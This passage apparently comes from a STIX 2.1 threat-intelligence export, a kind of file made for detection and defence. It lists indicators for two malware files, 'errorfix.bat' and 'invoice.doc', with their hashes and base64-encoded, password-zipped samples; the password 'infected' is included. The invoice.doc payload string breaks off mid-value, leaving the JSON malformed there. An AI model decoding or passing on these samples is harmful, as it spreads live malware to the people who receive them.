"pattern": "[file:hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:hashes.SHA1 = '7993ebdea9421a85b431077b2d89ee3344180759' AND file:hashes.SHA256 = '17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a' AND file:name = 'errorfix.bat' AND file:size = '2864' AND (file:content_ref.payload_bin = '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' AND file:content_ref.x_misp_filename = 'errorfix.bat' AND file:content_ref.hashes.MD5 = '4368db27ef2f07171c2c13d2e537d459' AND file:content_ref.mime_type = 'application/zip' AND file:content_ref.encryption_algorithm = 'mime-type-indicated' AND file:content_ref.decryption_key = 'infected')]",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:25:35Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:26:50.000Z",
"modified": "2020-03-10T14:26:50.000Z",
"pattern": "[file:hashes.MD5 = 'd627615f955dd5342ef6b4c6938ad98c' AND file:hashes.SHA1 = '645467b3207a50c43be075a0b81308a5f6935c59' AND file:hashes.SHA256 = '1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f' AND file:name = 'invoice.doc' AND file:size = '441560' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:26:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}